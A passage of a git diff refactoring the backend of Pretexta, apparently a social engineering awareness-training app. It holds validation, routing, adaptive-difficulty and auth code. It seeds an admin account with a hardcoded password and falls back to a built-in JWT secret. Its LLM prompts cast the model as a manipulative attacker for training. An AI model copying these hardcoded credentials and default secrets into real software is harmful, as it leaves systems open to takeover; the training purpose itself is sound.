Path): def validate_challenge_nodes(data): """Memeriksa konsistensi ID node dan NEXT pointer untuk tantangan.""" - node_ids = {node['id'] for node in data['nodes']} - + node_ids = {node["id"] for node in data["nodes"]} + # Kumpulkan semua target 'next' yang ada di opsi dan node target_ids = set() - for node in data['nodes']: + for node in data["nodes"]: # Ambil 'next' dari node (untuk message node) - if 'next' in node: - target_ids.add(node['next']) - + if "next" in node: + target_ids.add(node["next"]) + # Ambil 'next' dari opsi (untuk question node) - if node.get('type') == 'question' and 'options' in node: - for option in node['options']: - if 'next' in option: - target_ids.add(option['next']) + if node.get("type") == "question" and "options" in node: + for option in node["options"]: + if "next" in option: + target_ids.add(option["next"]) # Pastikan semua target 'next' menunjuk ke ID node yang valid for target_id in target_ids: if target_id not in node_ids: - raise Exception(f"Referensi node tidak valid: 'next' menunjuk ke ID '{target_id}', yang tidak ada di daftar node ID.") + raise Exception( + f"Referensi node tidak valid: 'next' menunjuk " + f"ke ID '{target_id}', yang tidak ada di " + f"daftar node ID." + ) # Pastikan ada node 'start' - if 'start' not in node_ids: + if "start" not in node_ids: raise Exception("Node 'start' (ID: 'start') wajib ada sebagai titik masuk.") # Pastikan tidak ada loop tertutup (pemeriksaan sederhana: node 'end' harus ada) - end_nodes = [node for node in data['nodes'] if node.get('type') == 'end'] + end_nodes = [node for node in data["nodes"] if node.get("type") == "end"] if not end_nodes: raise Exception("Setidaknya satu node bertipe 'end' wajib ada.") @@ -116,6 +129,6 @@ def validate_challenge_nodes(data): if len(sys.argv) < 2: print("Usage: python validate_yaml.py ") sys.exit(1) - + yaml_path = Path(sys.argv[1]) - validate_yaml_file(yaml_path) \ No newline at end of file + validate_yaml_file(yaml_path) diff --git a/backend/server.py b/backend/server.py index 087d9d6..b4a0f3a 100644 --- a/backend/server.py +++ b/backend/server.py @@ -1,708 +1,181 @@ -from fastapi import FastAPI, APIRouter, HTTPException, Depends, status -from fastapi.security import HTTPBearer, HTTPAuthorizationCredentials -from fastapi.responses import FileResponse, StreamingResponse -from dotenv import load_dotenv -from starlette.middleware.cors import CORSMiddleware -from motor.motor_asyncio import AsyncIOMotorClient -import os import logging -from pathlib import Path -from pydantic import BaseModel, Field, ConfigDict -from typing import List, Optional, Dict, Any +import os import uuid -from datetime import datetime, timezone, timedelta -import bcrypt -import jwt -import yaml -import re -from io import BytesIO -import json - -# ROOT_DIR = Path(__file__).parent -load_dotenv() - -# MongoDB connection -mongo_url = os.environ['MONGO_URL'] -client = AsyncIOMotorClient(mongo_url) -db = client[os.environ['DB_NAME']] - -# Create the main app without a prefix -app = FastAPI(title="Pretexta API") - -# Create a router with the /api prefix -api_router = APIRouter(prefix="/api") +from contextlib import asynccontextmanager +from datetime import UTC, datetime +from pathlib import Path -# JWT Configuration -JWT_SECRET = os.environ.get('JWT_SECRET', 'soceng-lab-secret-key-change-in-production') -JWT_ALGORITHM = "HS256" -JWT_EXPIRATION_HOURS = 24 +import yaml +from fastapi import APIRouter, FastAPI +from starlette.middleware.cors import CORSMiddleware -security = HTTPBearer() +from middleware.rate_limit import RateLimitMiddleware +from models.schemas import User +from routes import ( + adaptive_router, + analytics_router, + auth_router, + campaigns_router, + certificates_router, + challenges_router, + debrief_router, + imports_router, + leaderboard_router, + llm_router, + notifications_router, + organizations_router, + quizzes_router, + reports_router, + scenario_builder_router, + settings_router, + simulations_router, + webhooks_router, +) +from services.auth import hash_password +from services.database import db # Configure logging logging.basicConfig( level=logging.INFO, - format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' + format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", ) logger = logging.getLogger(__name__) -# ==================== MODELS ==================== -class User(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - username: str - password_hash: str - created_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) - is_active: bool = True - -class LoginRequest(BaseModel): - username: str - password: str - -class LoginResponse(BaseModel): - token: str - user: Dict[str, Any] - -class Challenge(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - title: str - description: str - difficulty: str # easy, medium, hard - cialdini_categories: List[str] - estimated_time: int # minutes - nodes: List[Dict[str, Any]] - metadata: Dict[str, Any] = Field(default_factory=dict) - content_en: Optional[Dict[str, Any]] = None - content_id: Optional[Dict[str, Any]] = None - created_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) +async def auto_import_yaml(db): + """Auto-import YAML sample data on first run.""" + data_dirs = [ + Path("/app/data/sample"), + Path("/app/data/professionals"), + Path("data/sample"), + Path("data/professionals"), + ] + total = 0 + for data_dir in data_dirs: + if not data_dir.exists(): + continue + for yaml_file in sorted(data_dir.glob("*.yaml")): + try: + with open(yaml_file, encoding="utf-8") as f: + data = yaml.safe_load(f) + yaml_type = data.get("type") + if not yaml_type: + continue + data["id"] = str(uuid.uuid4()) + data["created_at"] = datetime.now(UTC).isoformat() + if yaml_type == "challenge": + await db.challenges.insert_one(data) + elif yaml_type == "quiz": + await db.quizzes.insert_one(data) + else: + continue + total += 1 + logger.info(f" Imported: {data.get('title', yaml_file.name)}") + except Exception as e: + logger.warning(f" Failed to import {yaml_file.name}: {e}") + logger.info(f"Auto-import complete: {total} items loaded") + + +@asynccontextmanager +async def lifespan(app: FastAPI): + """Application startup and shutdown events.""" + # Startup: seed default admin user + existing_user = await db.users.find_one({"username": "soceng"}) + if not existing_user: + seed_user = User( + username="soceng", + password_hash=hash_password("Cialdini@2025!"), + display_name="Admin", + role="admin", + ) + doc = seed_user.model_dump() + doc["created_at"] = doc["created_at"].isoformat() + await db.users.insert_one(doc) + logger.info("Seed admin user created: soceng") -class Quiz(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - title: str - description: str - difficulty: str - cialdini_categories: List[str] - questions: List[Dict[str, Any]] - content_en: Optional[Dict[str, Any]] = None - content_id: Optional[Dict[str, Any]] = None - created_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) + # Ensure indexes + await db.users.create_index("username", unique=True) + await db.organizations.create_index("invite_code", unique=True, sparse=True) + await db.notifications.create_index([("user_id", 1), ("read", 1)]) + await db.simulations.create_index([("user_id", 1), ("status", 1)]) + await db.campaign_progress.create_index([("campaign_id", 1), ("user_id", 1)]) -class Simulation(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - challenge_id: Optional[str] = None - quiz_id: Optional[str] = None - simulation_type: str # challenge, quiz, ai_challenge - status: str # running, completed, paused - events: List[Dict[str, Any]] = Field(default_factory=list) - score: Optional[float] = None - started_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) - completed_at: Optional[datetime] = None - participant_name: Optional[str] = None - title: Optional[str] = None # Added for log display - - # AI Challenge specific fields - type: Optional[str] = None # For backwards compatibility, same as simulation_type - challenge_type: Optional[str] = None # comprehensive, email_analysis, interactive, scenario - category: Optional[str] = None # phishing, pretexting, baiting, etc. - difficulty: Optional[str] = None # beginner, intermediate, advanced - total_questions: Optional[int] = None - correct_answers: Optional[int] = None - answers: Optional[Dict[str, Any]] = None - challenge_data: Optional[Dict[str, Any]] = None + # Auto-import sample data if database is empty + challenge_count = await db.challenges.count_documents({}) + quiz_count = await db.quizzes.count_documents({}) + if challenge_count == 0 and quiz_count == 0: + logger.info("Empty database detected โ€” auto-importing sample data...") + await auto_import_yaml(db) -class LLMConfig(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = Field(default_factory=lambda: str(uuid.uuid4())) - provider: str # openai, gemini, claude, generic - api_key: str # encrypted - model_name: Optional[str] = None - enabled: bool = False - rate_limit: int = 100 # per hour - updated_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) + # Warn about default JWT secret + jwt_secret = os.environ.get("JWT_SECRET", "") + if not jwt_secret or jwt_secret == "change-this-secret-key-in-production": + logger.warning("WARNING: Using default JWT secret. Set JWT_SECRET env var in production!") -class Settings(BaseModel): - model_config = ConfigDict(extra="ignore") - id: str = "settings" - language: str = "en" - theme: str = "dark" - first_run_completed: bool = False - llm_enabled: bool = False - reduce_motion: bool = False + yield -# ==================== AUTH HELPERS ==================== + # Shutdown + from services.database import client -def hash_password(password: str) -> str: - return bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt()).decode('utf-8') + client.close() -def verify_password(password: str, password_hash: str) -> bool: - return bcrypt.checkpw(password.encode('utf-8'), password_hash.encode('utf-8')) -def create_token(user_id: str) -> str: - expiration = datetime.now(timezone.utc) + timedelta(hours=JWT_EXPIRATION_HOURS) - payload = { - "user_id": user_id, - "exp": expiration - } - return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) +# Create the app +app = FastAPI( + title="Pretexta API", + description="Social Engineering Simulation Lab API", + version="2.0.0", + lifespan=lifespan, +) -async def get_current_user(credentials: HTTPAuthorizationCredentials = Depends(security)) -> User: - try: - token = credentials.credentials - payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM]) - user_id = payload.get("user_id") - - user_doc = await db.users.find_one({"id": user_id}, {"_id": 0}) - if not user_doc: - raise HTTPException(status_code=401, detail="User not found") - - return User(**user_doc) - except jwt.ExpiredSignatureError: - raise HTTPException(status_code=401, detail="Token expired") - except Exception as e: - raise HTTPException(status_code=401, detail="Invalid token") +# API router with /api prefix +api_router = APIRouter(prefix="/api") -# ==================== ROUTES ==================== @api_router.get("/") async def root(): - return {"message": "Pretexta API", "version": "1.0.0"} - -# Auth Routes -@api_router.post("/auth/login", response_model=LoginResponse) -async def login(request: LoginRequest): - user_doc = await db.users.find_one({"username": request.username}, {"_id": 0}) - - if not user_doc or not verify_password(request.password, user_doc['password_hash']): - raise HTTPException(status_code=401, detail="Invalid credentials") - - user = User(**user_doc) - token = create_token(user.id) - - return LoginResponse( - token=token, - user={ - "id": user.id, - "username": user.username, - "created_at": user.created_at.isoformat() - } - ) - -@api_router.get("/auth/me") -async def get_me(current_user: User = Depends(get_current_user)): - return { - "id": current_user.id, - "username": current_user.username, - "created_at": current_user.created_at.isoformat() - } - -# Challenge Routes -@api_router.get("/challenges", response_model=List[Challenge]) -async def get_challenges(current_user: User = Depends(get_current_user)): - challenges = await db.challenges.find({}, {"_id": 0}).to_list(1000) - return challenges - -@api_router.get("/challenges/{challenge_id}", response_model=Challenge) -async def get_challenge(challenge_id: str, current_user: User = Depends(get_current_user)): - challenge = await db.challenges.find_one({"id": challenge_id}, {"_id": 0}) - if not challenge: - raise HTTPException(status_code=404, detail="Challenge not found") - return challenge - -@api_router.post("/challenges", response_model=Challenge) -async def create_challenge(challenge: Challenge, current_user: User = Depends(get_current_user)): - doc = challenge.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.challenges.insert_one(doc) - return challenge - -# Quiz Routes -@api_router.get("/quizzes", response_model=List[Quiz]) -async def get_quizzes(current_user: User = Depends(get_current_user)): - quizzes = await db.quizzes.find({}, {"_id": 0}).to_list(1000) - return quizzes + return {"message": "Pretexta API", "version": "2.0.0"} -@api_router.get("/quizzes/{quiz_id}", response_model=Quiz) -async def get_quiz(quiz_id: str, current_user: User = Depends(get_current_user)): - quiz = await db.quizzes.find_one({"id": quiz_id}, {"_id": 0}) - if not quiz: - raise HTTPException(status_code=404, detail="Quiz not found") - return quiz -# Simulation Routes -@api_router.post("/simulations") -async def create_simulation(simulation: Simulation, current_user: User = Depends(get_current_user)): - doc = simulation.model_dump() - doc['started_at'] = doc['started_at'].isoformat() - if doc.get('completed_at'): - doc['completed_at'] = doc['completed_at'].isoformat() - await db.simulations.insert_one(doc) - return {"id": simulation.id, "status": "created"} - -@api_router.get("/simulations", response_model=List[Simulation]) -async def get_simulations(current_user: User = Depends(get_current_user)): - sims = await db.simulations.find({}, {"_id": 0}).sort("started_at", -1).to_list(100) - return sims - -@api_router.get("/simulations/{simulation_id}", response_model=Simulation) -async def get_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): - sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) - if not sim: - raise HTTPException(status_code=404, detail="Simulation not found") - return sim - -@api_router.put("/simulations/{simulation_id}") -async def update_simulation(simulation_id: str, updates: Dict[str, Any], current_user: User = Depends(get_current_user)): - if updates.get('completed_at'): - updates['completed_at'] = datetime.now(timezone.utc).isoformat() - - result = await db.simulations.update_one( - {"id": simulation_id}, - {"$set": updates} - ) - - if result.matched_count == 0: - raise HTTPException(status_code=404, detail="Simulation not found") - - return {"message": "Simulation updated"} - -@api_router.delete("/simulations/{simulation_id}") -async def delete_simulation(simulation_id: str, current_user: User = Depends(get_current_user)): - result = await db.simulations.delete_one({"id": simulation_id}) - - if result.deleted_count == 0: - raise HTTPException(status_code=404, detail="Simulation not found") - - return {"message": "Simulation deleted successfully"} - -# LLM Config Routes -@api_router.get("/llm/config") -async def get_llm_configs(current_user: User = Depends(get_current_user)): - configs = await db.llm_configs.find({}, {"_id": 0}).to_list(100) - # Filter and mask configs - active_configs = [] - for config in configs: - # Skip configs with empty or no API key - if not config.get('api_key') or config.get('api_key') == '': - continue - # Mask actual API keys from response (security) - config['api_key'] = '***' - config['updated_at'] = config.get('updated_at', datetime.now(timezone.utc).isoformat()) - active_configs.append(config) - return active_configs - -@api_router.post("/llm/config") -async def save_llm_config(config: LLMConfig, current_user: User = Depends(get_current_user)): - doc = config.model_dump() - doc['updated_at'] = doc['updated_at'].isoformat() - - # If API key is empty, delete the config (revoke) - if not config.api_key or config.api_key == '': - await db.llm_configs.delete_one({"provider": config.provider}) - return {"message": "LLM config deleted"} - - # Update or insert - await db.llm_configs.update_one( - {"provider": config.provider}, - {"$set": doc}, - upsert=True - ) - - return {"message": "LLM config saved"} - -@api_router.post("/llm/generate") -async def generate_pretext(request: Dict[str, Any], current_user: User = Depends(get_current_user)): - """Generate pretext using LLM""" - requested_provider = request.get('provider', None) - prompt = request.get('prompt', '') - context = request.get('context', {}) - - # Get LLM config - use requested provider or first enabled one - if requested_provider: - config = await db.llm_configs.find_one({"provider": requested_provider, "enabled": True}, {"_id": 0}) - else: - config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) - - if not config: - raise HTTPException(status_code=400, detail="LLM provider not configured or not enabled. Please configure in Settings.") - - provider = config['provider'] - - # Import langchain chat models - from langchain_openai import ChatOpenAI - from langchain_google_genai import ChatGoogleGenerativeAI - from langchain_anthropic import ChatAnthropic - from langchain_core.messages import HumanMessage, SystemMessage - - # Set model based on provider - model_map = { - "gemini": "gemini-1.5-flash", - "claude": "claude-3-5-sonnet-20240620" - } - - # Priority: Configured Model -> Provider Default -> Fallback - model_name = config.get('model_name') or model_map.get(provider) - if not model_name: - model_name = "gemini-1.5-flash" - - - # Create the appropriate chat model based on provider - try: - if provider == "gemini": - # Gemini Model Fallback Strategy - # Some keys/regions don't support 1.5-flash yet, or require 'models/' prefix - model_candidates = [ - model_name, # configured default (e.g. gemini-1.5-flash) - "gemini-1.5-flash", # explicit preferred - "models/gemini-1.5-flash", # prefix variation - "gemini-pro", # old reliable fallback - "models/gemini-pro" - ] - - # Deduplicate preserving order - model_candidates = list(dict.fromkeys(model_candidates)) - - last_error = None - response = None - - for candidate in model_candidates: - try: - logger.info(f"Attempting Gemini generation with model: {candidate}") - chat_model = ChatGoogleGenerativeAI( - google_api_key=config['api_key'], - model=candidate, - temperature=0.7, - convert_system_message_to_human=True - ) - - # Prepare messages - context_str = json.dumps(context, indent=2) if isinstance(context, dict) else str(context) - system_message = SystemMessage(content="You are a social engineering pretext generator. Generate realistic, ethically-sound pretexts for security awareness training. Always mark outputs as training material.\n\nContext: " + context_str + "\n\n") - user_message = HumanMessage(content=prompt) - - response = await chat_model.ainvoke([system_message, user_message]) - if response: - break # Success! - except Exception as e: - logger.warning(f"Failed with model {candidate}: {str(e)}") - last_error = e - - if not response: - raise last_error or Exception("All Gemini models failed") - - elif provider == "claude": - chat_model = ChatAnthropic( - api_key=config['api_key'], - model=model_name, - temperature=0.7 - ) - # Standard invocation for Claude - context_str = json.dumps(context, indent=2) if isinstance(context, dict) else str(context) - system_message = SystemMessage(content="You are a social engineering pretext generator. Generate realistic, ethically-sound pretexts for security awareness training. Always mark outputs as training material.\n\nContext: " + context_str + "\n\n") - user_message = HumanMessage(content=prompt) - response = await chat_model.ainvoke([system_message, user_message]) - - else: - raise HTTPException(status_code=400, detail=f"Unsupported provider: {provider}") - - # Sanitize output (remove PII) - sanitized = repair_json(response.content) - - return {"generated_text": sanitized, "provider": provider} - - except Exception as e: - logger.error(f"LLM generation failed: {str(e)}") - # Return a clearer error to the frontend - error_msg = str(e) - if "NOT_FOUND" in error_msg: - error_msg = "Model not found. Your API Key might not support the selected model, or the region is restricted." - raise HTTPException(status_code=500, detail=f"LLM Generation Error: {error_msg}") - - # Remove markdown code blocks if present - text = re.sub(r'```(?:json)?', '', text) - text = text.replace('```', '') - - # Remove training markers - text = text.replace('\\[TRAINING\\]', '').replace('\\[TRAINING MATERIAL\\]', '') - - return text.strip() - -@api_router.post("/llm/chat") -async def chat_interaction(request: Dict[str, Any], current_user: User = Depends(get_current_user)): - """Real-time Chat Interaction for Roleplay""" - history = request.get('history', []) - persona = request.get('persona', {}) - user_message = request.get('message', '') - - # Get Config - config = await db.llm_configs.find_one({"enabled": True}, {"_id": 0}) - if not config: - raise HTTPException(status_code=400, detail="LLM config missing") - - provider = config['provider'] - api_key = config['api_key'] - - from langchain_core.messages import HumanMessage, SystemMessage, AIMessage - from langchain_google_genai import ChatGoogleGenerativeAI - from langchain_anthropic import ChatAnthropic - - # Construct System Prompt - system_prompt = f"""You are a roleplay actor in a cybersecurity simulation. - Role: {persona.get('name', 'Attacker')} - Goal: {persona.get('goal', 'Trick the user')} - Personality: {persona.get('style', 'Manipulative')} - Context: {persona.get('context', 'Corporate Environment')} - - INSTRUCTIONS: - 1. Respond naturally as your character. Short, realistic messages (whatsapp/email style). - 2. Do NOT break character. - 3. If the user successfully spots the attack or refuses securely, react accordingly (e.g. get angry, give up, or try a different angle). - 4. If the user FAILS (gives password, clicks link), output a special marker in your text: [SUCCESS_ATTACK]. - 5. If the user permanently BLOCKS the attack, output: [ATTACK_FAILED]. - """ - - messages = [SystemMessage(content=system_prompt)] - - # Reconstruct history - for msg in history: - if msg['role'] == 'user': - messages.append(HumanMessage(content=msg['content'])) - elif msg['role'] == 'assistant': - messages.append(AIMessage(content=msg['content'])) - - # Add current message - messages.append(HumanMessage(content=user_message)) - - response = None - last_error = None - error_logs = [] - - try: - if provider == "groq": - # Groq Logic (Fast & Free Tier) - from langchain_groq import ChatGroq - chat = ChatGroq( - api_key=api_key, - model_name="llama-3.3-70b-versatile", # High quality default - temperature=0.7 - ) - response = await chat.ainvoke(messages) - - elif provider == "gemini": - # Gemini Model Fallback Strategy - # Simplified fallback - model_candidates = ["gemini-1.5-flash", "gemini-pro"] - - for candidate in model_candidates: - try: - logger.info(f"Chat attempt with model: {candidate}") - convert_system = "1.5" not in candidate - - chat = ChatGoogleGenerativeAI( - google_api_key=api_key, - model=candidate, - temperature=0.8, - convert_system_message_to_human=convert_system - ) - - # Timeout protection - import asyncio - try: - response = await asyncio.wait_for(chat.ainvoke(messages), timeout=15.0) - except asyncio.TimeoutError: - raise Exception("Request timed out") - - if response: - logger.info(f"Chat success with model: {candidate}") - break - except Exception as e: - logger.warning(f"Chat failed with model {candidate}: {e}") - last_error = e - - if not response: - raise Exception(f"Gemini failed: {last_error}") - - elif provider == "claude": - chat = ChatAnthropic(api_key=api_key, model="claude-3-5-sonnet-20240620") - response = await chat.ainvoke(messages) - - else: - # Default to Groq if unknown, assuming user has groq key - from langchain_groq import ChatGroq - chat = ChatGroq(api_key=api_key, model_name="llama3-70b-8192") - response = await chat.ainvoke(messages) - - content = response.content - - status = "ongoing" - if "[SUCCESS_ATTACK]" in content: - status = "failed" # User failed the test - content = content.replace("[SUCCESS_ATTACK]", "") - elif "[ATTACK_FAILED]" in content: - status = "completed" # User passed - content = content.replace("[ATTACK_FAILED]", "") - - return { - "role": "assistant", - "content": content, - "status": status - } - - except Exception as e: - logger.error(f"Chat error: {e}") - error_msg = str(e) - if "401" in error_msg: - error_msg = f"Unauthorized. Please check your API Key for {provider}." - elif "404" in error_msg: - error_msg = f"Model Not Found. Provider: {provider}." - elif "429" in error_msg: - error_msg = f"Rate Limit Exceeded. Please try again later. Provider: {provider}." - - raise HTTPException(status_code=500, detail=error_msg) - -def repair_json(text: str) -> str: - """Attempt to repair and extract valid JSON from LLM output""" - text = sanitize_llm_output(text) - - # Try to find JSON object - start = text.find('{') - end = text.rfind('}') - - if start != -1 and end != -1: - text = text[start:end+1] - +@api_router.get("/health") +async def health_check(): + """Health check endpoint for Docker and monitoring.""" try: - # Validate if it's already good - json.loads(text) - return text - except json.JSONDecodeError: - # Simple repairs - # 1. Replace single quotes with double quotes (imperfect but helps) - # text = text.replace("'", '"') - # CAUTION: This might break text content. Only use if desperate. - pass - - return text - -# Settings Routes -@api_router.get("/settings", response_model=Settings) -async def get_settings(current_user: User = Depends(get_current_user)): - settings = await db.settings.find_one({"id": "settings"}, {"_id": 0}) - if not settings: - settings = Settings().model_dump() - await db.settings.insert_one(settings) - return settings + await db.command("ping") + return {"status": "healthy", "database": "connected"} + except Exception: + return {"status": "degraded", "database": "disconnected"} + + +# Register all route modules +api_router.include_router(auth_router) +api_router.include_router(challenges_router) +api_router.include_router(quizzes_router) +api_router.include_router(simulations_router) +api_router.include_router(llm_router) +api_router.include_router(settings_router) +api_router.include_router(imports_router) +api_router.include_router(reports_router) +api_router.include_router(leaderboard_router) +api_router.include_router(analytics_router) +api_router.include_router(organizations_router) +api_router.include_router(campaigns_router) +api_router.include_router(notifications_router) +api_router.include_router(webhooks_router) +api_router.include_router(scenario_builder_router) +api_router.include_router(debrief_router) +api_router.include_router(certificates_router) +api_router.include_router(adaptive_router) -@api_router.put("/settings") -async def update_settings(updates: Dict[str, Any], current_user: User = Depends(get_current_user)): - await db.settings.update_one( - {"id": "settings"}, - {"$set": updates}, - upsert=True - ) - return {"message": "Settings updated"} - -# YAML Import Route -@api_router.post("/import/yaml") -async def import_yaml_file(file_content: Dict[str, Any], current_user: User = Depends(get_current_user)): - """Import YAML challenge or quiz""" - try: - yaml_type = file_content.get('type') - data = file_content.get('data') - - if yaml_type == 'challenge': - challenge = Challenge(**data) - doc = challenge.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.challenges.insert_one(doc) - return {"message": "Challenge imported", "id": challenge.id} - - elif yaml_type == 'quiz': - quiz = Quiz(**data) - doc = quiz.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.quizzes.insert_one(doc) - return {"message": "Quiz imported", "id": quiz.id} - - else: - raise HTTPException(status_code=400, detail="Unknown YAML type") - - except Exception as e: - raise HTTPException(status_code=400, detail=f"Import failed: {str(e)}") - -# Report Generation Route -@api_router.get("/reports/{simulation_id}/json") -async def get_report_json(simulation_id: str, current_user: User = Depends(get_current_user)): - sim = await db.simulations.find_one({"id": simulation_id}, {"_id": 0}) - if not sim: - raise HTTPException(status_code=404, detail="Simulation not found") - - # Calculate detailed score - score_data = calculate_susceptibility_score(sim) - - report = { - "simulation_id": simulation_id, - "score": score_data, - "events": sim.get('events', []), - "started_at": sim.get('started_at'), - "completed_at": sim.get('completed_at'), - "participant_name": sim.get('participant_name') - } - - return report - -def calculate_susceptibility_score(simulation: Dict[str, Any]) -> Dict[str, Any]: - """Calculate susceptibility score 0-100""" - events = simulation.get('events', []) - - if not events: - return {"total": 0, "breakdown": {}} - - # Simple scoring logic - compliance_count = sum(1 for e in events if e.get('action') == 'complied') - total_events = len(events) - - # Lower score = more susceptible - base_score = max(0, 100 - (compliance_count / total_events * 100)) if total_events > 0 else 50 - - return { - "total": round(base_score, 2), - "breakdown": { - "compliance_rate": round((compliance_count / total_events * 100) if total_events > 0 else 0, 2), - "total_events": total_events - } - } - -# Include the router in the main app app.include_router(api_router) +# Middleware (order matters: last added = first executed) app.add_middleware( CORSMiddleware, allow_credentials=True, - allow_origins=os.environ.get('CORS_ORIGINS', '*').split(','), + allow_origins=os.environ.get("CORS_ORIGINS", "http://localhost:3000").split(","), allow_methods=["*"], allow_headers=["*"], ) -@app.on_event("startup") -async def startup_db(): - """Initialize database with seed user""" - # Check if seed user exists - existing_user = await db.users.find_one({"username": "soceng"}) - - if not existing_user: - seed_user = User( - username="soceng", - password_hash=hash_password("Cialdini@2025!") - ) - doc = seed_user.model_dump() - doc['created_at'] = doc['created_at'].isoformat() - await db.users.insert_one(doc) - logger.info("Seed user created: soceng / Cialdini@2025!") - -@app.on_event("shutdown") -async def shutdown_db_client(): - client.close() +app.add_middleware(RateLimitMiddleware, max_attempts=10, window_seconds=300) diff --git a/backend/services/__init__.py b/backend/services/__init__.py new file mode 100644 index 0000000..db9f487 --- /dev/null +++ b/backend/services/__init__.py @@ -0,0 +1,27 @@ +from services.adaptive import get_recommended_categories, get_recommended_difficulty +from services.auth import create_token, get_current_user, hash_password, verify_password +from services.gamification import BADGE_DEFINITIONS, award_xp, check_simulation_badges +from services.llm import ( + get_llm_chat_model, + get_llm_generate_model, + repair_json, + sanitize_llm_output, +) +from services.scoring import calculate_susceptibility_score + +__all__ = [ + "hash_password", + "verify_password", + "create_token", + "get_current_user", + "get_llm_chat_model", + "get_llm_generate_model", + "sanitize_llm_output", + "repair_json", + "calculate_susceptibility_score", + "award_xp", + "check_simulation_badges", + "BADGE_DEFINITIONS", + "get_recommended_difficulty", + "get_recommended_categories", +] diff --git a/backend/services/adaptive.py b/backend/services/adaptive.py new file mode 100644 index 0000000..d2ca737 --- /dev/null +++ b/backend/services/adaptive.py @@ -0,0 +1,141 @@ +import logging + +from services.database import db + +logger = logging.getLogger(__name__) + +# Difficulty scaling rules +DIFFICULTY_ORDER = ["easy", "medium", "hard"] + + +async def get_recommended_difficulty(user_id: str) -> str: + """Calculate recommended difficulty based on user performance.""" + sims = ( + await db.simulations.find( + {"user_id": user_id, "status": "completed"}, + {"_id": 0, "score": 1, "difficulty": 1, "started_at": 1}, + ) + .sort("started_at", -1) + .to_list(10) + ) + + if not sims or len(sims) < 3: + return "easy" + + # Look at last 5 simulations + recent = sims[:5] + recent_scores = [s.get("score", 50) or 50 for s in recent] + avg_score = sum(recent_scores) / len(recent_scores) + + current_difficulty = recent[0].get("difficulty", "medium") + current_idx = ( + DIFFICULTY_ORDER.index(current_difficulty) if current_difficulty in DIFFICULTY_ORDER else 1 + ) + + # Escalate if consistently scoring high + if avg_score >= 85 and current_idx < len(DIFFICULTY_ORDER) - 1: + return DIFFICULTY_ORDER[current_idx + 1] + # De-escalate if struggling + elif avg_score < 40 and current_idx > 0: + return DIFFICULTY_ORDER[current_idx - 1] + + return current_difficulty + + +async def get_recommended_categories(user_id: str) -> list: + """Suggest Cialdini categories the user needs to practice.""" + sims = await db.simulations.find( + {"user_id": user_id, "status": "completed"}, + {"_id": 0, "score": 1, "challenge_data": 1}, + ).to_list(100) + + category_scores = {} + category_counts = {} + + for sim in sims: + categories = sim.get("challenge_data", {}).get("cialdini_categories", []) + score = sim.get("score", 50) or 50 + for cat in categories: + category_scores.setdefault(cat, []).append(score) + category_counts[cat] = category_counts.get(cat, 0) + 1 + + # Find weak areas (lowest avg scores) and unexplored areas + all_categories = [ + "reciprocity", + "scarcity", + "authority", + "commitment", + "liking", + "social_proof", + ] + recommendations = [] + + for cat in all_categories: + if cat not in category_scores: + recommendations.append( + { + "category": cat, + "reason": "not_attempted", + "avg_score": 0, + } + ) + else: + avg = sum(category_scores[cat]) / len(category_scores[cat]) + if avg < 70: + recommendations.append( + { + "category": cat, + "reason": "needs_improvement", + "avg_score": round(avg, 1), + } + ) + + # Sort: not_attempted first, then lowest scores + recommendations.sort(key=lambda x: (x["reason"] != "not_attempted", x["avg_score"])) + + return recommendations[:3] + + +async def get_adaptive_persona_params(user_id: str) -> dict: + """Get adaptive parameters for AI chat persona based on user skill.""" + difficulty = await get_recommended_difficulty(user_id) + + params = { + "easy": { + "aggressiveness": 0.3, + "persistence": 2, + "technique_complexity": "basic", + "hints_enabled": True, + "instruction": ( + "Be somewhat obvious in your manipulation. " + "Use simple techniques. " + "Give the user clear red flags to catch." + ), + }, + "medium": { + "aggressiveness": 0.6, + "persistence": 4, + "technique_complexity": "intermediate", + "hints_enabled": False, + "instruction": ( + "Use moderately sophisticated manipulation. Mix techniques. Don't be too obvious." + ), + }, + "hard": { + "aggressiveness": 0.9, + "persistence": 6, + "technique_complexity": "advanced", + "hints_enabled": False, + "instruction": ( + "Use highly sophisticated, multi-layered " + "manipulation. Combine Cialdini principles. " + "Be very convincing and persistent. " + "Adapt your approach when resisted." + ), + }, + } + + return { + "recommended_difficulty": difficulty, + "params": params.get(difficulty, params["medium"]), + } diff --git a/backend/services/auth.py b/backend/services/auth.py new file mode 100644 index 0000000..3e664be --- /dev/null +++ b/backend/services/auth.py @@ -0,0 +1,51 @@ +import os +from datetime import UTC, datetime, timedelta + +import bcrypt +import jwt +from fastapi import Depends, HTTPException +from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer + +from models.schemas import User +from services.database import db + +JWT_SECRET = os.environ.get("JWT_SECRET", "soceng-lab-secret-key-change-in-production") +JWT_ALGORITHM = "HS256" +JWT_EXPIRATION_HOURS = 24 + +security = HTTPBearer() + + +def hash_password(password: str) -> str: + return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt()).decode("utf-8") + + +def verify_password(password: str, password_hash: str) -> bool: + return bcrypt.checkpw(password.encode("utf-8"), password_hash.encode("utf-8")) + + +def create_token(user_id: str) -> str: + expiration = datetime.now(UTC) + 